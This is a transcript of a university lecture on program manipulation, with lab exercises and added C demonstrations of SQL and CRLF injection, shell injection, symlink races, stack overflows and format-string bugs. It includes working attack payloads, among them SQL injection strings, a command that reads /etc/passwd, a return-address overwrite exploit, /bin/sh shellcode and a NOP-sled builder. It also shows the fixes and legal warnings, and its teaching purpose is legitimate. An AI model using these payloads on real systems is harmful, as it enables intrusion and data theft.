Basics in program manipulation hacking - PowerPoint PPT Presentation

Transcript and Presenter's Notes

1
Basics in program manipulation (hacking)
  • Ing. R.L.R. Huisman

2
Why should we check software?
  • Ing. R.L.R. Huisman

3
Index
  • What is program manipulation ?
  • Organizational matters
  • Injections (SQL and CRLF)
  • Buffer overflow/underflow
  • Format String bugs
  • TOCTOU
  • Conclusion
  • Pointers

4
Who is that?
  • Rolf Huisman, 23 years, girlfriend for 3 years
  • Computers since I was 5
  • Bachelor of ICT (HIO) Saxion Enschede
  • Currently graduating for
  • Master of Computer Science (here at the UT) ?
  • Technical advice on technical issues to many
    companies (including the Saxion Hogeschool and
    Inter-Actief)
  • Former Technical Manager for the Inter-Actief
    Web-Site System, ACM member

5
Program manipulation ?
  • Manipulate a program so its behavior differs from
    its intended behavior
  • Normally used in combination with social
    engineering during penetration testing.
  • (Penetration as in security, not girlfriend)
  • This presentation covers just the technical stuff,
    leaving out the user as target (no XSS, etc.)

6
Program manipulation ?
  • Negative image because of crackers/hackers
  • University of Texas loses 197,000 records:
    SQL injection (24-04-2006)
  • 200 websites using a zero-day exploit (IE):
    buffer overflow (28-03-2006)
  • http://www.securityfocus.com/

7
Program manipulation ?
  • My opinion
  • Teach people what goes wrong, so they think about
    it before doing wrong
  • Therefore I said yes to this.

8
Organizational matters
  • Get permission, otherwise it's illegal
  • You can already get 6 months even if nothing bad
    happens.
  • If, for example, a hospital is shut down, you could
    get 2 years (involuntary manslaughter)
  • RESPECT THE LAW
  • In general: article 138a of the Criminal Code

9
Organizational matters
  • 138a of the Criminal Code (new Version)

10
Organizational matters
  • 138a of the Criminal Code (new Version)
  • SO GET PERMISSION, OR DON'T DO IT AT ALL

11
Organizational matters
  • 138a of the Criminal Code (new Version)
  • SO GET PERMISSION, OR DON'T DO IT

12
Organizational matters
  • What you are allowed to hack
  • The designated server (ip <todo>)
  • What you aren't allowed to hack
  • THE REST of the world

13
Organizational matters
  • Great power comes with great responsibility
    (uncle Ben, Spiderman)
  • If you screw up, misuse or do something else with
    this knowledge, it's your own responsibility
  • I, CS, UT and Inter-Actief don't accept liability
  • So anyone who doesn't agree to all of this:
  • !!! LEAVE NOW !!!

14
Organizational matters
  • Please raise your hand if this applies to you.
  • Who has never programmed?
  • This may be a little bit difficult, because we
    aren't talking about social engineering. But hey,
    new day, new chances.

15
Organizational matters
  • Please raise your hand if this applies to you.
  • Who has never programmed in C or C++?
  • It's not a shame, because lots of people haven't.
    But you will never look at your language with the
    same eyes again.

16
Organizational matters
  • Please raise your hand if this applies to you.
  • Who doesn't know SQL?
  • Some things can be translated to text files as
    well. But since many systems make use of SQL, make
    sure you learn it one day.

17
Organizational matters
  • Please raise your hand if this applies to you.
  • Don't know Linux or Unix?

18
Organizational matters
  • Please raise your hand if this applies to you.
  • Don't know Linux?
  • Don't care. The stuff applies to every OS.
  • But remember while experimenting: buffer
    overflows are often protected against nowadays

19
Basic hacking techniques
  • There are a few basic techniques (bug classes)
  • Symlink races
  • Input validation
  • Buffer overflows
  • Time-of-check-to-time-of-use (TOCTOU)
  • These can be combined with other techniques

20
Basic hacking techniques
  • Symlink races
  • Program makes a temporary file
  • Program just overwrites it if the name already exists
  • Attacker makes a symlink with that name in advance
  • Program overwrites the target file the symlink
    points to

21
Basic hacking techniques
  • Example
  • One setuid program (has god rights :P)
  • Creates the file /tmp/temp and appends to it
  • Attacker creates a symlink from the temp file to
    /etc/.rhosts
  • When the file is removed, the symlink is gone
  • Since .rhosts now contains the appended data, logons
    as root work without a password

22
Basic hacking techniques
  • Input validation
  • Shell metacharacters
  • Injections
  • SQL
  • CRLF
  • Format String bugs (after buffer overflows)

23
Basic hacking techniques
  • Program is executed with parameters like
  • exec("./prog " + arg)
  • When arg contains shell metacharacters
  • Like ; | & ` $( )
  • Other commands can be executed
  • arg = "; cat /etc/passwd"
  • exec("./prog ; cat /etc/passwd")
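The difference between handing the argument to a shell and handing it to the program directly, as an added example that is not part of the slides. `echo` stands in for `./prog`, and the injected argument `hello; id` is constructed here: with the shell in the loop the `id` command runs, with `execvp()` the whole string is just one argv element.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run 'child' in a forked process with stdout redirected into 'out'.
 * Returns the number of bytes captured, or -1 on failure. */
static ssize_t capture(void (*child)(const char *), const char *arg,
                       char *out, size_t cap) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                      /* child: stdout -> pipe, then exec */
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);
        close(fds[1]);
        child(arg);
        _exit(127);                      /* only reached if the exec failed */
    }
    close(fds[1]);
    size_t n = 0;
    for (;;) {
        ssize_t got = read(fds[0], out + n, cap - 1 - n);
        if (got <= 0) break;
        n += (size_t)got;
        if (n >= cap - 1) break;
    }
    close(fds[0]);
    waitpid(pid, NULL, 0);
    out[n] = '\0';
    return (ssize_t)n;
}

/* Vulnerable: the argument is spliced into a command line that a shell
 * parses, which is exactly what system("./prog " + arg) does. */
static void run_via_shell(const char *arg) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "echo %s", arg);
    execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
}

/* Hardened: no shell involved; the argument reaches the program as a single
 * argv element, metacharacters and all. */
static void run_via_execvp(const char *arg) {
    char *const argv[] = { "echo", (char *)arg, NULL };
    execvp("echo", argv);
}

/* 1 if the injected "id" command ran (its output contains "uid="),
 * 0 if the argument was merely echoed back, -1 on error. */
static int injection_succeeded(void (*runner)(const char *), const char *arg) {
    char out[1024];
    if (capture(runner, arg, out, sizeof out) < 0) return -1;
    return strstr(out, "uid=") != NULL;
}

int main(void) {
    const char *payload = "hello; id";       /* constructed attacker input */
    printf("shell:  injected command ran = %d\n",
           injection_succeeded(run_via_shell, payload));
    printf("execvp: injected command ran = %d\n",
           injection_succeeded(run_via_execvp, payload));
    return 0;
}
```

The fix is not to filter metacharacters but to stop using a shell: once the command line is an argv array, there is no parser left for the attacker to talk to.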

24
Basic hacking techniques
  • Injection
  • Inserting extra information so its get processed
    different.
  • Most common used injection is SQL injection.
  • SQL injections are often the reason why
    information has leaked or a DB-server is hacked
    in a company

25
Basic hacking techniques
  • We have a function, anyone see a problem?
    bool val(string name, string passwd) {
        string query = "select name from users"
                     + " where name = '" + name + "'"
                     + " and passwd = '" + passwd + "'";
        ResultSet set = doquery(query);
        return set.hasElements();
    }

26
Basic hacking techniques
  • We have a function, anyone see a problem?
    bool val(string name, string passwd) {
        string query = "select name from users"
                     + " where name = '" + name + "'"
                     + " and passwd = '" + passwd + "'";
        ResultSet set = doquery(query);
        return set.hasElements();
    }
  • No checks, means money :P

27
Basic hacking techniques
  • rolf, apple would result in
  • select name from users where name = 'rolf' and
    passwd = 'apple'
  • But root, ' or 1 = 1 -- would result in
  • select name from users where name = 'root' and
    passwd = '' or 1 = 1 --'

28
Basic hacking techniques
  • rolf, apple would result in
  • select name from users where name = 'rolf' and
    passwd = 'apple'
  • But root, ' or 1 = 1 -- would result in
  • select name from users where name = 'root' and
    passwd = '' or 1 = 1 --'
  • Thus the system would return elements

29
Basic hacking techniques
  • So let's try this ourselves
  • IP address http://130.89.8.33 test server
  • Example 1
  • In example 2, he did a naive fix
  • He replaced all ' by \' ; try that one as well

30
Basic hacking techniques
  • Example 2
  • Naive fix: replace ' by \'
  • Hint: what does \\ mean?

31
Basic hacking techniques
  • Example 2 solution
  • Put a \ directly in front of the '.
  • \' gets replaced by \\', where the \\ is seen as one
    literal \ and the ' that follows is noticed as the
    closing quote after all.
  • So:
  • root, \' or 1 = 1 --
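Why the naive fix fails and what the correct escape looks like, as an added example in C (the slides do not say which language the test server used). The query builder mirrors `val()` from the earlier slide; the literal scanner assumes a MySQL-style dialect where a backslash escapes the next character inside a string. The attack inputs are the ones from the slides.

```c
#include <stdio.h>
#include <string.h>

/* Naive fix from the slides: put a backslash before every single quote. */
static void escape_naive(const char *in, char *out, size_t cap) {
    size_t n = 0;
    for (; *in && n + 2 < cap; in++) {
        if (*in == '\'') out[n++] = '\\';
        out[n++] = *in;
    }
    out[n] = '\0';
}

/* Proper escaping for a backslash-escaping dialect: the backslash itself must
 * be escaped too, otherwise an attacker's \' becomes \\' and the quote closes
 * the literal. (Parameterised queries avoid the whole problem.) */
static void escape_proper(const char *in, char *out, size_t cap) {
    size_t n = 0;
    for (; *in && n + 2 < cap; in++) {
        if (*in == '\'' || *in == '\\') out[n++] = '\\';
        out[n++] = *in;
    }
    out[n] = '\0';
}

/* Build the login query the way val() does, after escaping both inputs. */
static void build_login_query(const char *name, const char *passwd,
                              void (*esc)(const char *, char *, size_t),
                              char *query, size_t cap) {
    char en[256], ep[256];
    esc(name, en, sizeof en);
    esc(passwd, ep, sizeof ep);
    snprintf(query, cap,
             "select name from users where name = '%s' and passwd = '%s'",
             en, ep);
}

/* Copy everything the SQL parser would see *outside* string literals,
 * honouring \x escapes inside them. Whatever lands here is SQL syntax. */
static void outside_literals(const char *q, char *out, size_t cap) {
    int in_str = 0;
    size_t n = 0;
    for (; *q && n + 1 < cap; q++) {
        if (in_str) {
            if (*q == '\\' && q[1]) { q++; continue; }   /* escaped char stays inside */
            if (*q == '\'') in_str = 0;
            continue;
        }
        if (*q == '\'') { in_str = 1; continue; }
        out[n++] = *q;
    }
    out[n] = '\0';
}

/* 1 if attacker-supplied "or 1 = 1" ended up as SQL syntax rather than
 * inside the password literal. */
static int login_bypassed(const char *name, const char *passwd,
                          void (*esc)(const char *, char *, size_t)) {
    char query[1024], syntax[1024];
    build_login_query(name, passwd, esc, query, sizeof query);
    outside_literals(query, syntax, sizeof syntax);
    return strstr(syntax, "or 1 = 1") != NULL;
}

int main(void) {
    /* Constructed inputs: the plain attack and the backslash variant. */
    printf("naive,  ' or 1 = 1 --  : bypass = %d\n",
           login_bypassed("root", "' or 1 = 1 --", escape_naive));
    printf("naive,  \\' or 1 = 1 -- : bypass = %d\n",
           login_bypassed("root", "\\' or 1 = 1 --", escape_naive));
    printf("proper, \\' or 1 = 1 -- : bypass = %d\n",
           login_bypassed("root", "\\' or 1 = 1 --", escape_proper));
    return 0;
}
```

`outside_literals()` is the check to keep in mind when reading any string-built query: if anything you typed shows up in its output, you are writing SQL, not data.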

32
Basic hacking techniques
  • Example 3 is a lookup which has the same flaw.
  • The items table
  • The completed search SQL string is
  • select name from items where id = 8
  • Try to read the usernames from the table users
  • Hint: UNION can combine tables with different names
  • Like select 1 from a union select 2 from b

33
Basic hacking techniques
  • Example 3
  • You don't need to use a ' because it's expecting
    a number
  • or 1 = 1 would return the whole search table, as
    in: not good
  • or 1 = 1 union select name from users --
  • Returns the names.
  • One could even use system calls from SQL (try this
    at home)
  • Conclusion: security is needed everywhere, even in
    parts that don't handle authorisation

34
Basic hacking techniques
  • So what about other injections?
  • CRLF (carriage return, line feed) injections
  • The combination of characters 13 and 10 (\r\n)
    behind each other is considered a line break
  • (Windows line ending vs. Unix vs. old Apple)

35
Basic hacking techniques
  • CRLF injections
    private StringBuffer log = new StringBuffer();
    void log(String message) {
        log.append(System.currentTimeMillis());
        log.append(":");   // separator (character lost in transcript)
        log.append(message);
        log.append("\n");
    }

36
Basic hacking techniques
  • CRLF injections
    private StringBuffer log = new StringBuffer();
    synchronized void log(String message) {
        log.append(System.currentTimeMillis());
        log.append(":");   // separator (character lost in transcript)
        log.append(message);
        log.append("\n");
    }
  • Not filtered

37
Basic hacking techniques
    void logAccessDenied(String userName) {
        log(userName + " doesn't have access");
    }
  • With username
  • Reddog logged off\n13212131:Charly
  • Would result in the log showing
  • 13212130:Reddog logged off
  • 13212131:Charly doesn't have access
  • Thus creating the illusion Reddog wasn't there

38
Basic hacking techniques
  • Example 4
  • Try this yourself at the server
  • Create a false log entry which can't be
    distinguished.

39
Basic hacking techniques
  • Example 4 is the other way around :P
  • Charly\n13212131:Reddog logged off
  • And yes, I do filter on HTML tags
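The `log()` method from the previous slides redone in C, as an added example that is not part of the slides: the raw writer reproduces the forged second line, the sanitised writer turns CR and LF in untrusted input into visible `\r`/`\n` so one call is always one line. The username and timestamp are the constructed ones from the Reddog/Charly slide.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable: the message is appended as-is, so a "\n" inside it starts a
 * new line that a reader cannot tell from a genuine entry. */
static int log_raw(char *log, size_t cap, long ts, const char *message) {
    size_t used = strlen(log);
    int n = snprintf(log + used, cap - used, "%ld:%s\n", ts, message);
    return (n < 0 || (size_t)n >= cap - used) ? -1 : 0;
}

/* Hardened: CR and LF in the untrusted part are replaced by escapes before
 * the entry is written, so the line structure of the log stays intact. */
static int log_sanitised(char *log, size_t cap, long ts, const char *message) {
    char clean[512];
    size_t n = 0;
    for (; *message && n + 2 < sizeof clean; message++) {
        if (*message == '\n')      { clean[n++] = '\\'; clean[n++] = 'n'; }
        else if (*message == '\r') { clean[n++] = '\\'; clean[n++] = 'r'; }
        else clean[n++] = *message;
    }
    clean[n] = '\0';
    return log_raw(log, cap, ts, clean);
}

/* Number of lines in the log, i.e. how many entries a reader would believe exist. */
static int count_lines(const char *log) {
    int lines = 0;
    for (; *log; log++) if (*log == '\n') lines++;
    return lines;
}

/* Log one access-denied event for 'user' with the given writer and return
 * the resulting line count; -1 if the write failed. */
static int lines_after_denied(int (*writer)(char *, size_t, long, const char *),
                              const char *user) {
    char log[1024] = "";
    char message[600];
    snprintf(message, sizeof message, "%s doesn't have access", user);
    if (writer(log, sizeof log, 13212131L, message) != 0) return -1;
    return count_lines(log);
}

int main(void) {
    /* Constructed attacker username: ends the real line and starts a fake
     * entry for Charly with a plausible timestamp. */
    const char *forged = "Reddog logged off\n13212131:Charly";
    printf("raw:       %d line(s)\n", lines_after_denied(log_raw, forged));
    printf("sanitised: %d line(s)\n", lines_after_denied(log_sanitised, forged));
    return 0;
}
```

Escaping rather than dropping the characters keeps the evidence: the sanitised entry still shows that someone tried to inject a line break.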

40
Basic hacking techniques
  • Buffer overflows
  • Hardest problem to spot, thus the most commonly
    found security flaw
  • More difficult to exploit than injections
  • Buffer overflow is a class of bugs with many
    exploits
  • The publicly known term is buffer overflow; the
    variant described here is properly called stack
    smashing
  • Based on the way code is executed
  • Can sometimes be countered by NX and stack
    protectors (DEP, canaries, non-executable stack)

41
Basic hacking techniques
  • Memory ordering in a Process
  • 3 Elements
  • Stack
  • Data (or the heap)
  • Text (readonly)

(Diagram: Text, Data and Stack laid out in memory)
42
Basic hacking techniques
  • Memory ordering in a Process
  • 3 Elements
  • Stack
  • Data
  • Text
  • Growing towards each other (heap upwards, stack
    downwards)

(Diagram: Text, Data or the heap, and Stack, with the heap and stack growing towards each other)
43
Basic hacking techniques
  • So, what's this stack used for?
  • Calling of functions
  • If a function calls another function, it puts the
    return location on the stack, hence execution stack

44
Basic hacking techniques
  • Conceptually, when a computer adds 1 + 1

(Diagram: stack holding 1 and 1)
45
Basic hacking techniques
  • Conceptually, when a computer adds 1 + 1
  • It pops the items off the stack
  • Does its calculation
  • And puts the result on the stack

(Diagram: stack holding 2)
46
Basic hacking techniques
  • When a program calls a function
  • It pushes the old execution location (the return
    address) on the stack, with the stack register
    pointing to it

(Diagram: stack holding the old location)
47
Basic hacking techniques
  • When a program calls a function
  • It pushes the old execution location on the
    stack, and keeps on going

(Diagram: stack holding 1, 1 above the old location; then 2 above the old location)
48
Basic hacking techniques
  • When returning from a function, the program returns
    to the location designated by the stack
  • Setting the execution pointer to the old location

(Diagram: 2 on the stack, the old location popped for the return)
49
Basic hacking techniques
  • This stack in memory is flat
  • It grows from high addresses to low (right to left)
  • While variables on it are written from low
    addresses to high (left to right), towards the
    return pointer

(Diagram: flat memory: old location at the higher address, 2 below it)
50
Basic hacking techniques
  • So you have the stack with reserved static room
    for the variable
  • When supplying a too long variable
  • You overwrite the return pointer

(Diagram: a frame with room for the variable, padding/frame pointer and return pointer above the rest of the stack; after the overflow the data runs through the padding and over the return pointer)
51
Basic hacking techniques
  • Then the code the return pointer points to gets
    executed
  • Since this is your pointer, your code gets
    executed

(Diagram: the overwritten return pointer now points at the bad code :P above the rest of the stack)
52
Basic hacking techniques
  • Exception: STATUS_ACCESS_VIOLATION at eip=004010C4
  • eax=00000000 ebx=00000004 ecx=7C90FB71 edx=0000000D
    esi=6115E6D9 edi=61102C18 ebp=00224010 esp=0022EEA0
    program=C:\cygwin\home\reddog\prog1a.exe, pid 884,
    thread main
  • cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
  • In the dump:
  • Execution pointer (what am I executing): EIP
  • Stack pointer (top of the stack, where the return
    pointer is taken from on return): ESP

53
Basic hacking techniques
  • So, how can we do that? Our target:
    #include <stdio.h>
    void leesIets(void);
    int main(void) {
        int rechten = 0;
        leesIets();
        if (rechten)
    secure:
            printf("We will transfer the money\n");
        else
            printf("Forget it (%p)\n", &&secure);  /* GCC label address */
        return 0;
    }

56
Basic hacking techniques
  • Executing on i386 FreeBSD
  • echo | ./prog1a
  • Forget it (0x804858e)
  • Hmm, no rights to transfer money
  • But the memory location of secure on FreeBSD is
    0x804858e

57
Basic hacking techniques
  • So, how can we use that?
    #include <stdio.h>
    void leesIets(void);
    int main(void) {
        int rechten = 0;
        leesIets();                       /* Bug */
        if (rechten)
    secure:
            printf("We will transfer the money\n");
        else
            printf("Forget it (%p)\n", &&secure);
        return 0;
    }

58
Basic hacking techniques
    #include <unistd.h>
    void leesIets(void) {
        char input[128];
        static int c = 0;
        while (read(0, input + c++, 1) == 1)   /* no bound on c: overruns input[] */
            ;
    }

60
Basic hacking techniques
    #include <unistd.h>
    int pointer = 0x804858e;            /* address of secure */
    char buf[128];
    int main(void) {
        write(1, buf, 128);             /* buffer */
        write(1, buf, 8);               /* padding (optional) */
        write(1, buf, 4);               /* stack frame (optional) */
        write(1, &pointer, 4);          /* return address */
        /* Note: &pointer yields the bytes e8 85 04 08 (little-endian) */
        return 0;
    }

61
Basic hacking techniques
  • Execution on FreeBSD (Intel x86)
  • ./prog1b | ./prog1a
  • We will transfer the money
  • Segmentation fault (core dumped)
  • Execution on Windows XP SFU with DEP turned off
  • ./prog1b | ./prog1a
  • We will transfer the money
  • Segmentation fault (core dumped)

62
Basic hacking techniques
  • Example 5: try it yourself
  • Use backslash-hex escapes to create your
    characters, and overflow it :P
  • e.g. \x00\x00 is two zero bytes
  • A character is one byte (8 bit)
  • Target machine is an Intel x86 with 32-bit
    pointers, stored little-endian (least significant
    byte first)
  • E.g. pointer 0x4010ca becomes \xca\x10\x40\x00
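What the prog1a/prog1b pair relies on, made deterministic, as an added example that is not part of the slides. A 128-byte buffer sits directly in front of the word we care about (on the real stack that word is the saved return address; here it is a struct member so the layout is portable), an unbounded byte-by-byte copy like `leesIets()` runs past it, and `put_le32()` is the byte-order rule from the slide. The address 0x4010ca is the one the slide uses; the struct and the bounded variant are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A 32-bit address as the bytes a little-endian x86 stores: 0x4010ca -> ca 10 40 00. */
static void put_le32(uint32_t v, unsigned char out[4]) {
    out[0] = (unsigned char)v;
    out[1] = (unsigned char)(v >> 8);
    out[2] = (unsigned char)(v >> 16);
    out[3] = (unsigned char)(v >> 24);
}

/* The same four bytes read left to right as a hex dump shows them, so the
 * reversal is visible: 0x4010ca -> 0xca104000. */
static uint32_t le32_as_dump(uint32_t v) {
    unsigned char b[4];
    put_le32(v, b);
    return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) |
           ((uint32_t)b[2] << 8) | b[3];
}

/* The prog1b payload: buflen filler bytes, pad padding bytes, then the
 * address. Returns the total length, or 0 if it does not fit in 'cap'. */
static size_t build_payload(unsigned char *out, size_t cap, size_t buflen,
                            size_t pad, uint32_t ret) {
    size_t n = buflen + pad + 4;
    if (n > cap) return 0;
    memset(out, 'A', buflen + pad);
    put_le32(ret, out + buflen + pad);
    return n;
}

/* Stand-in for the frame of leesIets(): the 128-byte input buffer and, right
 * behind it, the word the attacker wants to control. */
struct frame {
    char input[128];
    uint32_t control;
};

/* Vulnerable: one byte at a time with no limit, as in
 * while (read(0, input + c++, 1) == 1). Bytes 128..131 land in 'control'.
 * (The write goes through a byte pointer to the whole struct so the demo
 * itself stays inside one object; the effect is that of overrunning input[].) */
static void copy_unbounded(struct frame *f, const unsigned char *data, size_t n) {
    unsigned char *base = (unsigned char *)f;   /* input[] is at offset 0 */
    if (n > sizeof *f) n = sizeof *f;
    for (size_t i = 0; i < n; i++) base[i] = data[i];
}

/* Hardened: refuse anything that does not fit in input[]. */
static int copy_bounded(struct frame *f, const unsigned char *data, size_t n) {
    if (n > sizeof f->input) return -1;
    memcpy(f->input, data, n);
    return 0;
}

/* Run the 132-byte payload through the unbounded copy; return what 'control'
 * holds afterwards (on a little-endian host: the address itself). */
static uint32_t control_after_unbounded(uint32_t ret) {
    unsigned char payload[256];
    struct frame f = { {0}, 0 };
    size_t n = build_payload(payload, sizeof payload, sizeof f.input, 0, ret);
    copy_unbounded(&f, payload, n);
    return f.control;
}

/* 1 if the bounded copy rejected the same payload and left 'control' untouched. */
static int bounded_rejects(uint32_t ret) {
    unsigned char payload[256];
    struct frame f = { {0}, 0 };
    size_t n = build_payload(payload, sizeof payload, sizeof f.input, 0, ret);
    return copy_bounded(&f, payload, n) == -1 && f.control == 0;
}

int main(void) {
    printf("0x4010ca in memory: %08x\n", le32_as_dump(0x4010ca));
    printf("unbounded copy: control = 0x%x\n", control_after_unbounded(0x4010ca));
    printf("bounded copy rejects: %d\n", bounded_rejects(0x4010ca));
    return 0;
}
```

On the real stack the padding and saved frame pointer sit between the buffer and the return address, which is why prog1b writes the optional 8 + 4 bytes before the pointer; the struct here has no such gap, so the payload is exactly 128 + 4 bytes.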

63
Basic hacking techniques
  • Example 5
  • If it works, nicely done, you understood it.
  • If it doesn't, try running without the exploit;
    see any differences?
  • Hint: one machine isn't like the other. Maybe
    it's not running FreeBSD

64
Basic hacking techniques
  • Example 5
  • The example runs Windows
  • So you need to point the pointer to a different
    location.
  • That's why we needed that address.
  • It was changed for the Windows version.

65
Basic hacking techniques
  • But I want to execute my own code
  • Put the code to execute inside the overflowing data
    and point the return pointer at it
  • This code is called the payload

(Diagram: the return pointer pointing back into the buffer, at the attacker's own code)
66
Basic hacking techniques
  • But where to point?
  • Guessing, most of the time
  • To tolerate an inaccurate pointer:
  • Prepend NOPs (\x90 on x86): landing anywhere in the
    sled slides into the code
  • And repeat the return pointer several times, so one
    copy lands on the saved return address

(Diagram: NOPs, then own code, then several copies of the return pointer)
67
Basic hacking techniques
  • Most of the time shared payloads
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\xeb\xeb\xeb"
  • Most common payload, opens a shell in Linux

68
Basic hacking techniques
  • Most of the time shared payloads
    "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e"
    "\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73"
    "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
    "\x53\x50\xb0\x3b\xcd\x80"
  • Most common payload, opens a shell in FreeBSD

69
Basic hacking techniques
  • Most of the time shared payloads
    "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e"
    "\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73"
    "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
    "\x53\x50\xb0\x3b\xcd\x80"
  • Shellcode is OS-specific: system call numbers and
    the way arguments are passed differ (Linux takes
    them in registers, FreeBSD on the stack), so match
    your payload to the target OS
  • Otherwise you will get memory violations
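Assembling the buffer from the NOP-sled slide (sled, shellcode, repeated return pointer) and two checks worth running before sending it, as an added example that is not part of the slides. The shellcode bytes are the Linux `/bin/sh` payload quoted above, minus the trailing `\xeb` bytes; the target address, the 140-byte distance to the saved return address and the number of pointer copies are made up for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The Linux x86 execve("/bin/sh") payload from the slide: 45 bytes, no NUL. */
static const unsigned char LINUX_SH[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define LINUX_SH_LEN (sizeof LINUX_SH - 1)      /* drop the string terminator */

static unsigned char demo_buf[512];             /* the buffer we assemble into */

static void put_le32(uint32_t v, unsigned char out[4]) {
    out[0] = (unsigned char)v;         out[1] = (unsigned char)(v >> 8);
    out[2] = (unsigned char)(v >> 16); out[3] = (unsigned char)(v >> 24);
}

/* 1 if no byte of the payload is NUL. A NUL ends the copy in strcpy()/
 * sprintf()-style sinks before the rest arrives; the read() loop in
 * leesIets() does not care, most other sinks do. */
static int nul_free(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++) if (p[i] == 0) return 0;
    return 1;
}

/* Layout: [NOP sled][shellcode][ret][ret]...  'ret_offset' is where the
 * saved return address lies relative to the start of the buffer; the sled is
 * sized so the shellcode ends exactly there and 'ret_copies' pointers follow.
 * Returns the total length, or 0 if the shellcode does not fit before
 * ret_offset or the whole does not fit in 'cap'. */
static size_t build_sled_payload(unsigned char *out, size_t cap, size_t ret_offset,
                                 size_t ret_copies, uint32_t ret,
                                 const unsigned char *sc, size_t sc_len) {
    if (sc_len > ret_offset) return 0;
    size_t sled = ret_offset - sc_len;
    size_t total = ret_offset + ret_copies * 4;
    if (total > cap) return 0;
    memset(out, 0x90, sled);                                /* x86 NOP */
    memcpy(out + sled, sc, sc_len);
    for (size_t i = 0; i < ret_copies; i++)
        put_le32(ret, out + ret_offset + i * 4);
    return total;
}

/* 1 if 'ret' lands inside the sled (anywhere in it is fine), 0 if it would
 * hit the middle of the shellcode or miss the buffer. 'buf_addr' is where the
 * target's buffer starts, e.g. the %p printed by the example 6 target. */
static int ret_hits_sled(uint32_t buf_addr, size_t sled_len, uint32_t ret) {
    return ret >= buf_addr && ret - buf_addr < sled_len;
}

int main(void) {
    /* Constructed target: buffer at 0xbffff000, return address 140 bytes in. */
    uint32_t buf_addr = 0xbffff000, ret = buf_addr + 0x10;
    size_t n = build_sled_payload(demo_buf, sizeof demo_buf, 140, 4, ret,
                                  LINUX_SH, LINUX_SH_LEN);
    printf("payload %zu bytes, sled %zu, shellcode NUL-free: %d, ret in sled: %d\n",
           n, (size_t)(140 - LINUX_SH_LEN), nul_free(LINUX_SH, LINUX_SH_LEN),
           ret_hits_sled(buf_addr, 140 - LINUX_SH_LEN, ret));
    return 0;
}
```

The pointer copies have to start on the same 4-byte alignment as the saved return address; `ret_offset` fixes that, which is why the sled rather than the pointer block absorbs any slack.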

70
Basic hacking techniques
  • Special things to take care of
  • FreeBSD allows just 64 NOPs
  • Windows is different from Windows with Cygwin
  • OpenBSD has a randomized stack
  • On Solaris 9 the location is different from Solaris 8
  • SPARC has other opcodes

71
Basic hacking techniques
  • Example 6: try this yourself, target:
    void leesIets(void) {
        char input[128];
        static int c = 0;
        printf("Location of input %p", input);
        while (read(0, input + c++, 1) == 1)
            ;
    }
  • The printed address as little-endian bytes: \x00\xee\x22\x00
  • int main(void) { leesIets(); }   /* Try to open a shell */

72
Basic hacking techniques
  • Example 6 solution, buffer layout:
    NOPs (max 64)
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\xeb\xeb\xeb"
    return pointers

73
Basic hacking techniques
  • Heap overflows
  • Same thing, but in heap memory
  • More difficult to exploit: there is no return
    address next to the buffer, so you need to
    overwrite something else (heap metadata, a function
    pointer) to change the execution pointer

74
Basic hacking techniques
  • Buffer underrun
  • Buffer is filled the other way around (from the end
    towards the start)
  • Usually an attempt to avoid buffer overflows. But
    essentially the same kind of overflow, at the other
    end of the buffer
75
Basic hacking techniques
  • Format string attack
  • Another variation on the buffer overflow theme
  • Easy to spot, hard to exploit
  • Found in 1999

76
Basic hacking techniques
  • The mistake
    void function(char *hello) {
        printf(hello);
    }
  • printf(hello) should be printf("%s", hello)
  • Why is this bad?

77
Basic hacking techniques
  • Why is this bad?
  • The compiler
  • printf("%s", string) passes a pointer to the string
    on the stack as an argument
  • printf(string) makes the string itself the format,
    which gets interpreted
  • With features like
  • %p: print a pointer (a location on the stack)
  • %x: print a value as hexadecimal

78
Basic hacking techniques
  • printf("It's %d\n", 23)

(Diagram: 23 on the stack above the rest of the frame, then printf)
79
Basic hacking techniques
  • printf("It's %d\n", 23)
  • printf("%s%s%s%s%s%s%s%s%s%s")

(Diagram: the first call with 23 on the stack above the rest of the frame; the second with no argument at all, yet each %s still consumes a word)
80
Basic hacking techniques
  • Why does this happen?
  • Broken by design
  • Normally:
  • The arguments for printf are put on the stack
  • printf is called
  • Our case:
  • Only the format string is on the stack
  • printf is called
  • But printf doesn't know how many arguments there
    are or how big they are; it trusts the format

81
Basic hacking techniques
  • Key: %08x
  • printf("\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n")
  • Each %08x consumes one word from the stack; %n
    writes the number of characters printed so far to
    the address it consumes, here the 0xbfffc8c0 placed
    at the start of the string
